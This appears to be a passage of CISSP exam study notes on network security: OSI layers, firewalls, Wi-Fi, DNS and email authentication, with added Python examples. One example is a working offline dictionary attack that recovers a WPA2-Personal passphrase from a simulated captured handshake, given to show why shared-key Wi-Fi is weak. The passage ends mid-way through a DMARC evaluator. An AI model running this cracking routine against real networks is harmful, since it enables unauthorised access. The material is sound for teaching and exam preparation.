
EXAM POINTERS

DOMAIN 4: COMMUNICATION AND NETWORK SECURITY

ABHISHEK JHA
CISSP CISA CDPSE CEH
https://www.linkedin.com/in/abhishek-jha-b02a741aa/
KEY CONCEPTS
Bridge Connects two network segments at Layer 2 (forwards frames by MAC address)
Brouters Router + Bridge. Routes routable traffic first; if it cannot route, it bridges
Gateway Connects networks that use different protocols, e.g. IPv4 to IPv6
ARP Poisoning Spoofed ARP replies change the IP-to-MAC mapping in the victim's ARP table (enables MitM on a LAN)
CSMA / CD Carrier Sense Multiple Access with Collision Detection. Eg Ethernet (802.3)
CSMA / CA Carrier Sense Multiple Access with Collision Avoidance. Eg Wireless (802.11)
Token Passing Token (24 bit) acts as the carrier. No collisions, as no station transmits without the token.
Routing Protocols
  Distance Vector Direction & distance in hops. RIP, IGRP. BGP (connects ISPs) is a path-vector variant
  Link State Builds a map of the topology and computes the shortest path. OSPF
SNMP v3 Manages network devices. Use only v3: v1/v2c send the community string in clear text and have no integrity protection
ICMP Attacks (Layer 3)
  Loki Covert channel: carries a payload inside ICMP packets
  Ping of Death Oversized ping whose fragments reassemble to more than the maximum IP packet size (65,535 bytes), crashing weak IP stacks
  Ping Flood Too many ping (echo request) packets
  Smurf ICMP echo request sent to a network's broadcast address with the victim's address spoofed as the source; every host replies to the victim (RDDoS: reflected and amplified)
  Counter: Block directed broadcasts on routers
Layer 4 Attacks
  SYN Flood Sends only SYN packets, leaving half-open connections until the backlog is exhausted. Counter: SYN cookies, or a stateful firewall that limits half-open connections
  Fraggle Same as Smurf, but uses UDP (echo / chargen ports) (RDDoS)
  Counter: Block directed broadcasts on routers
Salami Many small attacks (or thefts) add up to one large attack
Data Diddling Altering / manipulating data, usually before or during entry
Tear Drop (Layer 3) Sends IP fragments with overlapping offsets that the OS does not know how to reassemble
Buffer Overflow Writes more data than a buffer can hold, overwriting adjacent memory and possibly control data
  Counter: Input validation, memory bounds checks / limits
Bonk Similar to Teardrop. Manipulates fragment offsets so the host reassembles and accepts a packet far larger than allowed
Land Attack Creates a "circular reference" on a machine: sends a SYN packet whose source IP and port equal the destination IP and port, so the host replies to itself
Virus A piece of malicious code that can take many forms and serve many purposes.
  Needs a host file in which to live, and an action by the user to spread
Worm Similar to a virus, but does not need a host and is self-replicating over the network
Logic Bomb A type of malicious code that lies dormant until a logical event (date, condition) occurs
Trojan Horse One program (usually malicious code) masquerades as another, legitimate one.
  Common means of distributing back door programs
Back Door Programs A program that allows access (often administrative access) to a system while bypassing normal security controls. Examples are NetBus, Back Orifice, SubSeven
Converged Protocols
  FCoE Fibre Channel over Ethernet, for network data storage (SAN) solutions. Fibre Channel frames are carried directly in Ethernet in place of IP (the CISSP CBK therefore places it at L-3)
  MPLS Directs data using short path labels instead of IP lookups. High throughput & performance
  iSCSI Block-level storage (SCSI commands over TCP/IP), location independent, over LAN / WAN. Cheaper alternative to FCoE. Used in cloud
  VoIP Voice over IP: signalling (e.g. SIP) and media (RTP) over IP. Secure with TLS for signalling and SRTP for media
  SDN Network virtualization. Separates the control plane (CP) from the data plane (DP)
  CDN Content delivery network: replicated resources deployed at various geographies. Low latency and high performance
NAC (Network Access Control)
  Pre-Admission NAC agent on the endpoint checks its posture before it is allowed onto the network
  Post-Admission Monitors the endpoint's actions after admission and allows / denies accordingly
Secure Communication Protocols
  IPSec Standard architecture for VPNs (AH for integrity / authentication, ESP for confidentiality)
  Kerberos Authentication protocol for SSO
  SSH Encrypted remote shell and tunnel, end to end
  Signal Protocol End-to-end encrypted messaging (double ratchet)
  SRPC (L-7) Secure RPC
  SSL Deprecated. SSL 3.0 is broken by the POODLE attack
  TLS Use TLS 1.2 or 1.3; TLS 1.0 / 1.1 are deprecated. Encrypts the application payload and authenticates the server (optionally the client) with certificates
Bastion Host Hardened host that faces the internet and brokers access to internal systems
Screened Subnet aka DMZ. Sits between two firewalls / routers / bastion hosts
OSI MODEL
For each layer: Responsibility | Data unit | Devices / Info | Firewall generation | Protocols | TCP/IP model layer

7 APPLICATION
  Responsibility: User application services. Smartest / content layer: certificates, non-repudiation, mail, API
  Data unit: Data
  Devices / Info: Gateways
  Firewall: Kernel proxy FW (Gen-5), hardware based, very fast
  Protocols: HTTP, FTP, SSH, DNS, SNMP, SMTP
  TCP/IP model: Application
6 PRESENTATION
  Responsibility: Data translation, formatting, compression & encryption
  Data unit: Data
  Devices / Info: File-level formatting, encryption & compression; EFS (Encrypting File System)
  Firewall: none
  Protocols: SSL/TLS, SSH, IMAP, FTP, MPEG, JPEG
  TCP/IP model: Application
5 SESSION
  Responsibility: Session establishment, management & termination. Simplex, half-duplex, full-duplex
  Data unit: Data
  Devices / Info: Application-to-application dialogue
  Firewall: Circuit-level gateway (Gen-2): inspects the TCP handshake and allows a protocol as long as it behaves like it should
  Protocols: API, Socket, Winsock, RPC, DNS, NFS, SQL
  TCP/IP model: Application
4 TRANSPORT
  Responsibility: End-to-end connections, segmentation and reassembly
  Data unit: Segment (TCP) / Datagram (UDP)
  Attacks: SYN Flood (TCP); Fraggle (UDP, RDDoS)
  Firewall: Stateful inspection FW (Gen-3) tracks TCP/UDP connection state at L3 & L4
  Protocols: TCP, UDP, SSL/TLS, SPX
  TCP/IP model: Transport (Host-to-Host)
3 NETWORK
  Responsibility: Logical addressing, routing (path determination), datagram encapsulation, error handling and diagnostics
  Data unit: Packet / Datagram
  Devices / Info: Router (isolates broadcast traffic); logical addressing; IPsec for security
  Attacks: Ping Flood / Ping of Death / Loki; Smurf attack (spoofed source address, RDDoS)
  Firewall: Static / stateless packet filter (Gen-1), very limited: all or nothing, blocks an entire protocol or port
  Protocols: IP, ICMP, NAT, IPsec, RIP, BGP, IKE, ISAKMP, FCoE
  TCP/IP model: Internet
2 DATA LINK
  Responsibility: Logical Link Control (LLC) and Media Access Control (MAC) sublayers; framing, physical (MAC) addressing, error detection
  Data unit: Frame
  Devices / Info: Switch (doesn't broadcast traffic), bridge, NIC, MAC address. Tunnelling: L2TP gives the tunnel, IPsec gives the security
  Protocols: Ethernet (802.3), Wi-Fi (802.11), 802.1X (NAC), CHAP, EAP, PAP, PPP, PPTP, L2TP, ARP
  TCP/IP model: Link (Network Access)
1 PHYSICAL
  Responsibility: Encoding & signalling, physical data transmission, hardware specifications, topology and design
  Data unit: Bits (no addressing)
  Devices / Info: Cable, hub, repeater, modem
  Protocols / media: Coax, fiber, wireless
  TCP/IP model: Link (Network Access)
FIREWALLS
1st Gen (Layer 3, stateless)
  Packet filter, static packet filtering, stateless firewall
  Uses ACLs (router + filtering application)
  Decision based on source / destination IP, port and protocol in the headers
  Does not maintain the state of connections
  Attacks on 1st Gen FW (packet filter):
  IP address spoofing: a packet from outside carries an internal source IP address.
    Counter: Discard packets arriving on the outside interface whose source IP is internal.
  Source routing attacks: the attacker specifies the route the packet takes (IP loose / strict source-route options), which was otherwise decided by the routers.
    Counter: Drop packets with source routing (aka path addressing) options set.
  Tiny fragment attacks: the attacker splits the TCP header across fragments, expecting only the first fragment to be examined and the rest to be allowed through.
    Counter: Drop first fragments too small to hold the full transport header, or reassemble before filtering.
2nd Gen
  Application FW (L-7, aka proxy FW / app proxy): understands the application protocol (HTTP, FTP etc.) and inspects each packet. Slow due to the extra processing
  Circuit-level FW (L-5, aka circuit proxy): monitors the TCP handshake; sits between the internal & external network. Eg SOCKS (Socket Secure). Blocks SYN attacks because half-open connections never reach the internal host
3rd Gen (L3 & L4, stateful)
  Maintains a connection (state) table and drops packets that do not belong to a known connection (e.g. an unsolicited SYN-ACK)
  Vulnerable to a DoS against itself: an attacker can fill the state table (e.g. SYN flood) and exhaust its resources
  Connections are disrupted if the FW reboots, since the state table is lost
  Context-dependent access control (the decision depends on the connection's state and history)
  Configure to fail secure (block all)
4th Gen
  Dynamic packet-filtering FW (Gen 1 + Gen 3)
  Deep Packet Inspection (L-7): filters on payload contents rather than just headers. Can block domain names, malware, spam or other identifiable elements in the payload
5th Gen / Next Gen FW (NGFW)
  Multi-function device with several security features in addition to a firewall: IDS/IPS, TLS/SSL proxy, web filtering, QoS management, bandwidth throttling, VPN, NAT & AV
FIREWALL BEST PRACTICES
  Block unnecessary ICMP packet types (be careful though: know your environment)
  Keep ACLs simple
  Use implicit deny (default deny at the end of every ACL)
  Disallow source-routed packets
  Use least privilege
  Block directed IP broadcasts (Smurf / Fraggle amplification)
  Perform egress filtering: block traffic leaving the network from a non-internal source address (indicates internal systems may be used as zombies in a DDoS attack)
  Perform ingress filtering: block traffic entering the network from an internal source address (indicates a potential spoofing attack)
  Enable logging
  Drop fragments, or reassemble fragments before inspection
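The following is an added example, not part of the original notes: a toy stateless (1st-gen) packet filter in Python that applies the hygiene checks above (ingress / egress anti-spoofing, source-routed packets, directed broadcasts, fragments, the Land pattern) before an ACL that ends in implicit deny. The packet fields, the internal address space 10.0.0.0/8, the assumption that internal subnets are /24, and the ACL are all constructed for this example.

```python
# Added example (not from the study notes): stateless packet filter with the
# best-practice pre-checks. All addresses, subnets and rules are constructed.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

INSIDE = ipaddress.ip_network("10.0.0.0/8")  # assumed internal address space
MIN_FIRST_FRAGMENT = 20 + 20                 # minimal IP header + full TCP header, bytes


@dataclass
class Packet:
    iface: str                    # "outside" or "inside": interface it arrived on
    src: str
    dst: str
    proto: str                    # "tcp", "udp" or "icmp"
    sport: int = 0
    dport: int = 0
    source_routed: bool = False   # IP loose/strict source-route option present
    frag_offset: int = 0          # non-zero => not the first fragment
    more_fragments: bool = False  # MF flag: more fragments follow this one
    length: int = 1500            # total length of this fragment in bytes


@dataclass
class Rule:
    action: str                   # "permit" or "deny"
    proto: str = "any"
    dst_net: str = "0.0.0.0/0"
    dport: Optional[int] = None
    iface: str = "any"

    def matches(self, p: Packet) -> bool:
        return ((self.proto == "any" or self.proto == p.proto)
                and (self.iface == "any" or self.iface == p.iface)
                and ipaddress.ip_address(p.dst) in ipaddress.ip_network(self.dst_net)
                and (self.dport is None or self.dport == p.dport))


def is_directed_broadcast(dst: str) -> bool:
    """True if dst is the broadcast address of an internal /24 (assumption:
    every internal subnet is a /24)."""
    a = ipaddress.ip_address(dst)
    return a in INSIDE and (int(a) & 0xFF) == 0xFF


def filter_packet(p: Packet, acl: List[Rule]) -> Tuple[str, str]:
    """Stateless verdict for one packet: (action, reason). The hygiene checks
    run before the ACL; the ACL ends in an implicit deny."""
    src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
    if src == dst:                                  # Land attack pattern
        return "deny", "land-attack"
    if p.iface == "outside" and src in INSIDE:      # ingress filtering
        return "deny", "ingress-spoof"
    if p.iface == "inside" and src not in INSIDE:   # egress filtering
        return "deny", "egress-spoof"
    if p.source_routed:                             # attacker-chosen path
        return "deny", "source-routed"
    if is_directed_broadcast(p.dst):                # Smurf / Fraggle amplifier
        return "deny", "directed-broadcast"
    if p.frag_offset != 0:                          # no port info to filter on
        return "deny", "non-first-fragment"
    if p.more_fragments and p.length < MIN_FIRST_FRAGMENT:
        return "deny", "tiny-fragment"              # TCP header split across fragments
    for rule in acl:
        if rule.matches(p):
            return rule.action, f"acl:{rule.proto}/{rule.dport or 'any'}"
    return "deny", "implicit-deny"


# Constructed ACL: only HTTPS and SMTP may reach the DMZ host 10.1.1.10 from outside
ACL = [
    Rule("permit", "tcp", "10.1.1.10/32", 443, "outside"),
    Rule("permit", "tcp", "10.1.1.10/32", 25, "outside"),
]

if __name__ == "__main__":
    samples = [
        Packet("outside", "203.0.113.5", "10.1.1.10", "tcp", 40000, 443),
        Packet("outside", "10.2.3.4", "10.1.1.10", "tcp", 40000, 443),
        Packet("outside", "203.0.113.5", "10.1.1.255", "icmp"),
        Packet("outside", "203.0.113.5", "10.1.1.10", "tcp", 40000, 443,
               more_fragments=True, length=28),
        Packet("outside", "203.0.113.5", "10.1.1.10", "tcp", 40000, 22),
    ]
    for pkt in samples:
        print(pkt.src, "->", pkt.dst, pkt.proto, pkt.dport, filter_packet(pkt, ACL))
```

Note what a filter like this cannot do: it has no memory, so a SYN-ACK from outside to an allowed port looks identical to a reply to a real connection, and a reassembled stream is never inspected. That is the gap the stateful (3rd gen) and deep-packet-inspection generations close.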
Firewall Pointers
  - Most effective against unrequested traffic and attempts to connect from outside the private network
  - Typically cannot block viruses or malicious code on their own; that needs AV or content inspection
  - Static packet-filtering FWs filter traffic by examining message headers
  - Application gateway level FWs are also called proxies: they copy packets from one network to another rather than routing them
  - Circuit-level gateway FWs establish communication sessions between trusted partners
  - Stateful inspection FWs, aka dynamic packet filtering, evaluate the state or context of network traffic
  - Deep packet inspection FWs filter the payload contents of a communication rather than only basing filtering on header values
  - Next gen FWs also include IDS, proxies, QoS management, and more
  - Multi-homed firewalls have at least two interfaces and filter traffic between two networks
FW Deployment Count the number of zones connected to the FW: single tier, two tier, three tier
WIRELESS NETWORKS
Wireless cells Areas within a physical environment where a wireless device can connect to an access point
802.11 IEEE standard for wireless network communications
802.11i Wireless security standard (implemented as WPA2)
Wi-Fi Deployment
  Ad hoc mode (aka peer-to-peer Wi-Fi) Directly between two devices, without an AP / base station. Ad hoc supports only WEP.
  Wi-Fi Direct is an upgraded version of ad hoc that supports WPA2 and WPA3
  Infrastructure mode A wireless access point (WAP) is required.
    Standalone mode: the access point connects clients to each other but not to any wired resources.
    Wired extension mode: the access point acts as a connection point to the wired network.
WEP (Not Secure) Wired Equivalent Privacy
  Uses a predefined pre-shared key (PSK)
  Key is static and shared among all WAPs and devices
  Uses Rivest Cipher 4 (RC4)
  Weaknesses: static common key, and poor implementation of IVs (24-bit initialization vectors that repeat)
WPA (Not Secure) Wi-Fi Protected Access (alternative to WEP)
  Uses TKIP to derive a fresh per-packet key instead of using the fixed PSK directly for all devices
  Stronger (48-bit) IV, but still uses RC4
  Compromised: TKIP / RC4 has known weaknesses, and WPA deployments that used LEAP were broken by ASLEAP
WPA 2 AES (block cipher), 128 bit, in CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol)
  Two editions:
  Personal Edition: Pre-Shared Key (the passphrase and SSID derive one key, the PMK, shared by every client)
  Enterprise Edition: 802.1X / EAP authentication with individual credentials per user (RADIUS backend)
WPA 3 Extension of WPA2
  Enterprise Edition: 192-bit security mode (AES-256)
  Personal Edition: AES 128 bit; SAE (Simultaneous Authentication of Equals) replaces the PSK handshake and resists offline dictionary attacks
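The following is an added example, not part of the original notes, showing why the "one pre-shared key for everyone" design of WPA/WPA2-Personal matters. It derives the PMK exactly as 802.11i specifies (PBKDF2-HMAC-SHA1 over passphrase and SSID, 4096 iterations, 256 bits), derives the PTK from a 4-way handshake, and then runs the offline dictionary attack that tools like aircrack-ng perform against a captured handshake. The SSID, MAC addresses, nonces, EAPOL frame, wordlist and the weak passphrase are all constructed for this example.

```python
# Added example (not from the study notes): WPA2-Personal key derivation and the
# offline dictionary attack it enables. All handshake material is constructed.
import hashlib
import hmac
from typing import List, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), as 802.11i
    defines for WPA/WPA2-Personal. Every client on the network derives this same key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the 4-way handshake inputs: AP MAC (AA), client MAC (SPA), both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (CCMP) key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed. KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake material. Only the passphrase is secret; everything below
# is what a passive sniffer sees over the air during the 4-way handshake.
SSID = "HomeWiFi"
AA = bytes.fromhex("001122334455")        # constructed AP MAC
SPA = bytes.fromhex("66778899aabb")       # constructed client MAC
ANONCE = hashlib.sha256(b"constructed-anonce").digest()
SNONCE = hashlib.sha256(b"constructed-snonce").digest()
# Simplified EAPOL-Key message 2 body (type, key info, lengths, replay counter,
# SNonce, zeroed MIC); a real frame carries more fields but the check is the same.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE + bytes(16)


def simulate_capture(passphrase: str) -> dict:
    """Produce what the client would transmit for this passphrase (stands in for a pcap)."""
    pmk = wpa2_pmk(passphrase, SSID)
    kck = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_MSG2, "mic": eapol_mic(kck, EAPOL_MSG2)}


CAPTURE = simulate_capture("sunshine1")   # weak passphrase chosen for the example
WORDLIST = ["password", "12345678", "letmein1", "sunshine1", "dragon99"]


def crack_handshake(cap: dict, wordlist: List[str]) -> Optional[str]:
    """Offline dictionary attack: recompute PMK -> PTK -> KCK -> MIC for each candidate
    and compare with the captured MIC. No further contact with the AP is needed."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, cap["ssid"])
        kck = derive_ptk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(CAPTURE, WORDLIST))
```

The cost per guess is one PBKDF2 run (4096 SHA-1 rounds), which is cheap on a GPU; a long random passphrase is the only defence under WPA2-Personal. WPA3-Personal's SAE handshake is a password-authenticated key exchange, so a captured handshake no longer lets an attacker test guesses offline, and WPA2-Enterprise avoids the shared secret entirely by giving each user their own credential.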
WIRELESS ATTACKS
  War driving Looking for wireless networks the attacker is not authorized to access
  War chalking Marking an area to advertise Wi-Fi presence
  Replay Retransmission of captured communications
  Wireless sniffing (eg air sniffing) Possible where encryption is weak (IV or poor implementation) or absent
  Rogue access point Unauthorized / fake Wi-Fi access point
  Evil twin Cloning the SSID of a Wi-Fi network already known to the phone / device (one it previously connected to) and transmitting that SSID so the device connects to the attacker's AP
802.1x/EAP Standard port-based network access control; ensures that clients cannot communicate until proper authentication has taken place
  Uses RADIUS or TACACS+, certificates, smart cards, etc.
  Extensible Authentication Protocol (EAP) is an authentication framework, not a specific mechanism of authentication
PEAP Protected Extensible Authentication Protocol: runs EAP methods within a TLS tunnel
LEAP (Not Secure) Lightweight EAP, Cisco proprietary, broken by ASLEAP. Should be avoided when possible
MAC Filter A list of authorized wireless MAC addresses; blocks access to non-authorized devices (weak control: MAC addresses are easily spoofed)
TKIP Temporal Key Integrity Protocol
  Improvements include a key-mixing function that combines the initialization vector with the secret root key before using RC4 to encrypt, plus a sequence counter that prevents replay attacks
* WPA2 (Enterprise Edition) is the recommended choice amongst WEP, WPA and WPA2.
* WPA3 Enterprise Edition is the most secure.
BLUETOOTH
BLUETOOTH (802.15) Personal area network (PAN)
  Does not have strong native security built in; secured only by PIN-based pairing
  Bluetooth security: device should not be left in discoverable mode; no default pairing; pair only with authentication codes
Bluetooth Attacks
  Bluejacking Sending unsolicited (spam) messages over Bluetooth
  Bluesnarfing Attacker connects to your Bluetooth device and exfiltrates data (contacts, messages, files)
  Bluebugging Attacker takes control of the device over Bluetooth (make calls, read messages, eavesdrop)
ZIGBEE (802.15.4) Protocol used to connect smart devices in a PAN.
  Security: ensure network isolation and proper authentication.
* Bluetooth & Zigbee both fall under IEEE 802.15
Li-Fi Uses visible light, which does not pass through walls, so traffic cannot be picked up from outside the room; a MitM within line of sight is still possible, so encryption is still required

DNS
TLD Top-level domain: .com in www.google.com
Registered Domain Name google in www.google.com
Subdomain or hostname www in www.google.com
Primary authoritative name server Hosts the original zone file for the domain
Secondary authoritative name server Hosts read-only copies of the zone file
Zone file Collection of resource records (A, AAAA, MX, NS, TXT, ...) for the domain
DNSSEC Signs DNS records so resolvers can verify origin authentication and integrity of DNS data (it does not encrypt queries)
DNS Poisoning Falsifying the DNS information used by a client to reach a desired system
  Attacking the real DNS server and placing incorrect information into its zone file, or injecting forged answers into a resolver's cache (cache poisoning)
Rogue DNS server aka DNS spoofing, pharming
Pharming Malicious redirection of a valid website's URL or IP address to a fake website that hosts a false version of the original valid site
Domain hijacking Changing the registration of a domain name without the authorization of the valid owner

EMAIL SECURITY
X.400 Standard for addressing and message handling
POP3 (L-7) Downloads email from the server (usually deleting it there)
IMAP (L-7) Keeps mail on the server; gives the option to download or delete
SMTP Exchanges messages from client to server and between servers (Exchange server on Windows, Sendmail on Unix)
SMTP Relay Issues Open relay: an SMTP server that relays mail without authenticating senders
  Open relays enable spoofing and spam, so secure the relay with proper authentication.
  * Spamming and mail bombing are common issues that are hard to stop.
S/MIME (PAIN) Default standard for email security
  Signed – A, I, N – signed with the sender's digital certificate (X.509)
  Enveloped – P, A, I – encrypted to the recipient's certificate
  (P = Privacy / confidentiality, A = Authentication, I = Integrity, N = Non-repudiation)
PGP Originally used IDEA for bulk encryption; OpenPGP today uses AES and other ciphers
DKIM The sending domain signs outgoing mail with its private key; the receiver fetches the matching public key from the domain's DNS TXT record and verifies the signature.
  Challenge: a genuine domain that has not published a key, or whose mail is modified in transit (e.g. by a mailing list), fails verification.
SPF (Prevents Spoofing) The receiving mail server takes the HELO name and the envelope sender (MAIL FROM) address on receipt, then performs a TXT DNS query for the alleged domain's SPF record. The SPF entry lists which servers may send for the domain and is used to validate the sending server. If validation fails, the message is rejected (-all) or marked as softfail (~all), depending on the record.
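The following is an added example, not part of the original notes: a minimal SPF (RFC 7208) evaluator in Python that checks the envelope MAIL FROM domain for a given client IP. DNS is replaced by an in-memory dict so it runs offline, and only the ip4, ip6, include and all mechanisms are implemented; the domains, addresses and records are constructed for the example and are not real records.

```python
# Added example (not from the study notes): toy SPF evaluator over constructed
# TXT records. Supports ip4 / ip6 / include / all only.
import ipaddress
from typing import Dict

# Constructed TXT records standing in for DNS lookups
DNS_TXT: Dict[str, str] = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_DNS_MECHANISMS = 10   # RFC 7208 section 4.6.4 limit on DNS-querying terms


def check_host(ip, domain: str, txt: Dict[str, str], depth: int = 0) -> str:
    """RFC 7208 check_host(): evaluate the SPF record of `domain` for `ip`."""
    if depth > MAX_DNS_MECHANISMS:
        return "permerror"
    record = txt.get(domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"                      # domain publishes no SPF policy
    for term in record.split()[1:]:        # skip the "v=spf1" version tag
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name == "all":
            return QUALIFIERS[qualifier]   # catch-all decides everything not matched
        if name in ("ip4", "ip6"):
            # an IPv6 client never matches an ip4 network (and vice versa)
            if ip in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif name == "include":
            # Recursive evaluation: only a "pass" from the included record matches
            if check_host(ip, arg, txt, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        else:
            return "permerror"             # a / mx / exists / redirect not implemented here
    return "neutral"                       # record ended without an "all" term


def evaluate_spf(client_ip: str, mail_from: str, txt: Dict[str, str] = DNS_TXT) -> str:
    """Evaluate SPF for the envelope MAIL FROM address of a connection from client_ip.
    Note that only the envelope domain is consulted; the header From: is never seen."""
    domain = mail_from.rsplit("@", 1)[-1]
    return check_host(ipaddress.ip_address(client_ip), domain, txt)


if __name__ == "__main__":
    for ip, sender in [("192.0.2.10", "alice@example.com"),
                       ("198.51.100.10", "alice@example.com"),
                       ("203.0.113.7", "alice@example.com"),
                       ("203.0.113.7", "bounce@attacker.example")]:
        print(ip, sender, "->", evaluate_spf(ip, sender))
```

The last sample shows the SPF limitation the pointers below describe: a message with MAIL FROM bounce@attacker.example and a header From: of ceo@example.com gets SPF "none" (or even "pass", if attacker.example publishes its own record) because SPF is evaluated against the envelope domain only. Tying the authenticated domain to the header From: is DMARC's job.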
DKIM When sending an outgoing message, the domain's last outbound server checks its internal settings to see whether the domain used in the "From:" header is in its signing table. If it is, a new header named "DKIM-Signature" is added to the message, computed with the domain's private key over the selected headers and the body.
  The signed content cannot be changed from here on without invalidating the signature. On receipt, the receiving server performs a TXT DNS query (selector._domainkey.domain) to retrieve the public key named in the DKIM-Signature header and verifies the signature. The DKIM check result can then be used to decide whether a message is trustworthy.
DMARC On receipt, the receiving mail server looks up the DMARC record (_dmarc.domain) for the domain in the "From:" header, then runs the SPF and DKIM checks.
  The check passes if SPF or DKIM passes AND the domain that passed aligns with the "From:" domain (relaxed: same organizational domain; strict: exact match). If it fails, the receiver applies the action published in the DMARC policy: none (monitor only), quarantine, or reject, and sends aggregate / forensic reports to the addresses listed in the record.
SPF vs DKIM vs DMARC
Expanded form
  SPF: Sender Policy Framework
  DKIM: DomainKeys Identified Mail
  DMARC: Domain-based Message Authentication, Reporting & Conformance
What is it?
  SPF: A system to declare & verify who can send emails from a given domain
  DKIM: An email authentication system based on asymmetric (public / private) cryptographic keys
  DMARC: An email authentication system that helps determine what to do when an email fails SPF or DKIM checks
How does it work?
  SPF: The receiving host checks if the sending host is permitted to send emails from the sender domain. The information stating who can send emails is stored in a TXT record in the DNS zone
  DKIM: The sending host signs the email body and / or headers with its private key. The receiving host verifies the signature, identifying whether the fields are intact. The public key is published using DNS TXT records
  DMARC: The receiving host applies the DKIM and SPF checks, then validates the results against the published DMARC policy and decides what to do: block, quarantine, deliver, or report to the sender. The DMARC policy is published via DNS TXT records
Why is it important?
  SPF: Helps prevent spoofing and can prevent damage to your brand
  DKIM: Greatly reduces the chance that your messages are marked as spam, by way of the digital signature
  DMARC: Helps the receiving organization decide what to do with mails that fail checks, and creates a feedback loop (reports) to allow course correction
Pointers
  SPF: Only concerned with the MailFrom (envelope) address. It is not checked against the Header From address, so it does not in any way protect against header-from spoofing or display-name spoofing.
  DKIM: Does not directly prevent abusive / malicious behaviour. DKIM is just a signature; anyone can sign mail for a domain they control.
  DMARC: Adds the alignment check that ties the SPF- or DKIM-authenticated domain to the Header From, plus a published policy and reporting.
Use cases
  - Envelope-from spoofing: SPF
  - Header-from spoofing: SPF + DMARC, DKIM + DMARC, or SPF + DKIM + DMARC. No one mechanism alone is sufficient.
  - Display-name spoofing: advanced threat filters, transport rules, and user training. None of the mechanisms care about the display name.
  - Compromised mailboxes or "legitimate" senders: advanced threat filters, transport rules, and user training.
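The following is an added example, not part of the original notes: a DMARC (RFC 7489) evaluator in Python that takes the SPF and DKIM results a receiver already has, checks alignment against the header From: domain, and returns the disposition from the published policy. It covers the DMARC description above and the header-from spoofing use case. The record parser, alignment test and p / sp handling follow the RFC; the DNS record, domains and message scenarios are constructed for the example, and the organizational domain is approximated as the last two labels (real receivers use the Public Suffix List).

```python
# Added example (not from the study notes): DMARC alignment and policy
# evaluation over constructed SPF/DKIM results and a constructed DNS record.
from typing import Dict, Optional, Tuple

# Constructed DNS TXT record; real receivers query _dmarc.<domain>
DNS_TXT: Dict[str, str] = {
    "_dmarc.example.com":
        "v=DMARC1; p=reject; sp=quarantine; aspf=s; adkim=r; rua=mailto:dmarc-rua@example.com",
}


def parse_dmarc(txt: str) -> dict:
    """Parse 'v=DMARC1; p=reject; adkim=s; ...' into tag/value pairs with RFC defaults."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    tags.setdefault("adkim", "r")      # relaxed alignment is the default
    tags.setdefault("aspf", "r")
    tags.setdefault("sp", tags["p"])   # subdomain policy defaults to p
    return tags


def org_domain(domain: str) -> str:
    # Approximation: last two labels. Real implementations use the Public Suffix List.
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def lookup_policy(header_from: str, txt: Dict[str, str] = DNS_TXT) -> Optional[dict]:
    """Exact From: domain first, then its organizational domain (RFC 7489 section 6.6.3)."""
    for d in (header_from.lower(), org_domain(header_from)):
        if "_dmarc." + d in txt:
            return parse_dmarc(txt["_dmarc." + d])
    return None


def aligned(auth_domain: Optional[str], header_from: str, mode: str) -> bool:
    """Strict ('s'): exact match. Relaxed ('r'): same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == header_from.lower()
    return org_domain(auth_domain) == org_domain(header_from)


def evaluate_dmarc(msg: dict, txt: Dict[str, str] = DNS_TXT) -> Tuple[str, str]:
    """msg carries the receiver's own results: header_from, spf_result, spf_domain
    (MAIL FROM domain), dkim_result, dkim_domain (the d= tag of a verified signature).
    Returns (dmarc_result, disposition)."""
    hf = msg["header_from"]
    policy = lookup_policy(hf, txt)
    if policy is None:
        return "none", "none"          # no DMARC record: nothing to enforce
    spf_ok = msg.get("spf_result") == "pass" and aligned(msg.get("spf_domain"), hf, policy["aspf"])
    dkim_ok = msg.get("dkim_result") == "pass" and aligned(msg.get("dkim_domain"), hf, policy["adkim"])
    if spf_ok or dkim_ok:
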